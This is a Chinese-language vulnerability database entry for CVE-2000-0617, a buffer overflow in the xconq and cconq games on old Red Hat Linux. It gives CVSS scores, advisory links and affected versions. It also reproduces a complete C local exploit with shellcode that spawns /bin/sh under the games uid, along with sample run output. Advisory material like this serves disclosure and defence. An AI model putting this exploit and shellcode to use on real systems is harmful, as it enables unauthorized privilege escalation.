CVE-2000-0617
CVSS4.6
发布时间 :2000-06-22 00:00:00
修订时间 :2008-09-10 15:05:12
NMCOES    

[原文]Buffer overflow in xconq and cconq game programs on Red Hat Linux allows local users to gain additional privileges via long USER environmental variable.


[CNNVD]xconq多重缓冲区溢出漏洞(CNNVD-200006-095)

        Red Hat Linux xconq和cconq game程序存在缓冲区溢出漏洞。本地用户借助超长用户环境变量提升额外特权。

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0617
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0617
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200006-095
(官方数据源) CNNVD

- 其它链接及资源

http://archives.neohapsis.com/archives/bugtraq/2000-06/0222.html
(VENDOR_ADVISORY)  BUGTRAQ  20000622 RHL 6.2 xconq package - overflows yield gid games

- 漏洞信息

xconq多重缓冲区溢出漏洞
中危 缓冲区溢出
2000-06-22 00:00:00 2005-10-20 00:00:00
本地  
        Red Hat Linux xconq和cconq game程序存在缓冲区溢出漏洞。本地用户借助超长用户环境变量提升额外特权。

- 公告与补丁

        Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- 漏洞信息 (20093)

Stanley T. Shebs Xconq 7.2.2 Buffer Overflow Vulnerabilities in xconq (EDBID:20093)
linux local
2000-06-22 Verified
0 V9
N/A [点击下载]
source: http://www.securityfocus.com/bid/1495/info

Xconq is a multiple player strategy game available for many unix platforms. It contains a number of buffer overflow vulnerabilities including the ability to overflow stack buffers with either the DISPLAY or the USER environment variables. The Redhat Linux Xconq package installs the game with SGID 'games' privileges allowing an attacker to compromise the local 'games' group. 

/* (linux)xconq[v7.4.1] local buffer overflow, by:
v9[v9@fakehalo.org].  this
    will give you uid=games on systems with
xconq.  this exploit was slightly
    more work than i thought it was going to be. 
i originally wrote this
    exploit for the -g parameter.  but, via the -g
parameter you must have a
    display.  via ths -L parameter you do not need
a display, but it is much
    more exact.  in this method you have to fill
the XCONQCONFIG environmental
    variable to a certain point to be able to
overwrite the eip via the -L
    parameter.  (64 bytes is more than enough).  i
also needed to modify some
    shellcode for this.  all in all, too much work
for what it is worth.

    example(test usage):
------------------------------------------------------------------------------
bash# echo id|(id;cc xxconq.c -o xxconq;./xxconq
-5000 0 20 507)
fakehalo: uid:1000 gid:100. [euid:1000 egid:100]
[ (linux)xconq[v7.4.1] local buffer overflow, by:
v9[v9@fakehalo.org]. ]
*** [data]: addr: 0xbffffdc4, offset: -5000,
alignment: 0, uid: 20, cap: 507.
*** [data]: sizeof(bofeip): 512, sizeof(env):
4096, sizeof(push): 64, nop=3579.

              Welcome to X11 Xconq version 7.4.1
(Dec 2000)

Xconq is free software and you are welcome to
distribute copies of it
under certain conditions; type "o copying" to see
the conditions.
There is absolutely no warranty for Xconq; type "o
warranty" for details.
fakehalo: uid:20 gid:100. [euid:20 egid:100]
bash#
------------------------------------------------------------------------------

    note: built and tested on slackware.  some
other overflowable functions i
          will mention are the -g parameter and
the XCONQLIB environmental
          variable,  both of those overflows
require a display to exploit.
          this program also has an odd usage of
setuid(); in it to drop its
          privileges -- making it possible to
break.  and yes, i squished the
          code together on purpose.  why? i am a
*x80 resolution kinda guy :/.
*/
#define PATH "/usr/local/bin/xconq"     // path to
xconq7.4.1.
#define DEFAULT_ALIGN 0                 // generic
alignment.
#define DEFAULT_OFFSET -5000            // generic
offset. (from bufsize)
#define DEFAULT_UID 20                  // user id
of games.
#define DEFAULT_CAP 507                 // exact
buffer cut off point.
#define FILLER 0x78                     // filling
character, for misc use.
static char exec[]= // setreuid()+exec():
v9@fakehalo.org.

"\x31\xdb\x31\xc9\xbb\xff\xff\xff\xff\xb1\x00\x31\xc0\xb0\x46\xcd\x80\x31\xdb"

"\x31\xc9\xb3\x00\xb1\x00\x31\xc0\xb0\x46\xcd\x80\xeb\x24\x5e\x8d\x1e\x89\x5e"

"\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"

"\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff\x2f\x62"
 "\x69\x6e\x2f\x73\x68\x01";
long esp(void){__asm__("movl %esp,%eax");}
int main(int argc,char **argv){
 char bofeip[512],env[4096],push[64];int
i,offset,align,uid,cap;long ret;
 printf("[ (linux)xconq[v7.4.1] local buffer
overflow, by: v9[v9@fakehalo.org]"
 ". ]\n");

if((argv[1]&&!strcmp(argv[1],"-h"))||(argv[1]&&!strcmp(argv[1],"--help"))){ 
  printf("*** [syntax]: %s [offset] [alignment]
[user id] [capoff buffer value"
  "].\n",argv[0]);
  printf("*** [required]: argument alignment value
must be: 0-3.\n");
  printf("*** [required]: argument user id value
must be: 1-255.\n");
  printf("*** [required]: argument cap value must
be: 1-%d.\n",sizeof(bofeip));
  exit(0);
 }

if(argc>1){offset=atoi(argv[1]);}else{offset=DEFAULT_OFFSET;}
 if(argc>2){
  if(atoi(argv[2])>3||atoi(argv[2])<0){
   printf("*** [error]: ignored argument alignment
value: %s. (use 0-3)\n",
   argv[2]);align=DEFAULT_ALIGN;   
  }
  else{align=atoi(argv[2]);}
 }
 else{align=DEFAULT_ALIGN;}
 if(argc>3){
  if(atoi(argv[3])<1||atoi(argv[3])>255){
   printf("*** [error]: ignored argument uid
value: %s. (use 1-255)\n",
   argv[3]);uid=DEFAULT_UID;
  }
  else{uid=atoi(argv[3]);}
 }
 else{uid=DEFAULT_UID;}
 if(argc>4){

if(atoi(argv[4])<1||atoi(argv[4])>sizeof(bofeip)){
   printf("*** [error]: ignored argument cap
value: %s. (use 1-%d)\n",argv[4],
   sizeof(bofeip));cap=DEFAULT_CAP;
  }
  else{cap=atoi(argv[4]);}
 }
 else{cap=DEFAULT_CAP;}

ret=(esp()-offset);for(i=0;i<align;i++){bofeip[i]=FILLER;}
 for(i=align;i<(sizeof(bofeip)-4);i+=4){*(long
*)&bofeip[i]=ret;}
 bofeip[cap]=0x0;

for(i=0;i<(sizeof(env)-strlen(exec)-strlen(bofeip));i++){env[i]=0x90;}

exec[10]=uid;exec[22]=uid;exec[24]=uid;memcpy(env+i,exec,strlen(exec));
 env[(i+strlen(exec))]=0x0;printf("*** [data]:
addr: 0x%lx, offset: %d, alignm"
 "ent: %d, uid: %d, cap: %d.\n*** [data]:
sizeof(bofeip): %d, sizeof(env): %d,"
 " sizeof(push): %d,
nop=%d.\n",ret,offset,align,uid,cap,sizeof(bofeip),

sizeof(env),sizeof(push),(strlen(env)-strlen((char
*)strrchr(env,0x90))+1));

setenv("EXEC",env,1);memset(push,FILLER,sizeof(push));

push[sizeof(push)]=0x0;setenv("XCONQCONFIG",push,1);
 if(execl(PATH,PATH,"-L",bofeip,0)){
  printf("*** [error]: could not execute %s
properly.\n",argv[0]);
  exit(-1);
 }
}
		

- 漏洞信息

84633
Red Hat Linux xconq Multiple Variable Local Overflow
Local Access Required Input Manipulation
Loss of Integrity Solution Unknown
Exploit Public Third-party Verified

- 漏洞描述

Red Hat Linux is prone to an overflow condition. The xconq and cconq game programs fail to properly sanitize user-supplied input resulting in a buffer overflow. With a specially crafted USER environment variable, a local attacker can potentially cause a denial of service or execute arbitrary code.

- 时间线

2000-06-22 Unknow
Unknow Unknow

- 解决方案

OSVDB is not aware of a solution for this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Multiple Buffer Overflow Vulnerabilities in xconq
Boundary Condition Error 1495
No Yes
2000-06-22 12:00:00 2009-07-11 02:56:00
This vulnerability was first reported in a message to Bugtraq on June 22, 2000 by Stan Bubrouski <satan@fastdial.net>.

- 受影响的程序版本

Stanley T. Shebs Xconq 7.2.2
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 alpha
- RedHat Linux 6.1 sparc
- RedHat Linux 6.1 i386
- RedHat Linux 6.1 alpha
- RedHat Linux 6.0 sparc
- RedHat Linux 6.0 alpha
- RedHat Linux 6.0

- 漏洞讨论

Xconq is a multiple player strategy game available for many unix platforms. It contains a number of buffer overflow vulnerabilities including the ability to overflow stack buffers with either the DISPLAY or the USER environment variables. The Redhat Linux Xconq package installs the game with SGID 'games' privileges allowing an attacker to compromise the local 'games' group.

- 漏洞利用

This exploit was contributed by Chris Sharp &lt;v9@fakehalo.org&gt; on December 25, 2000.

- 解决方案

Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站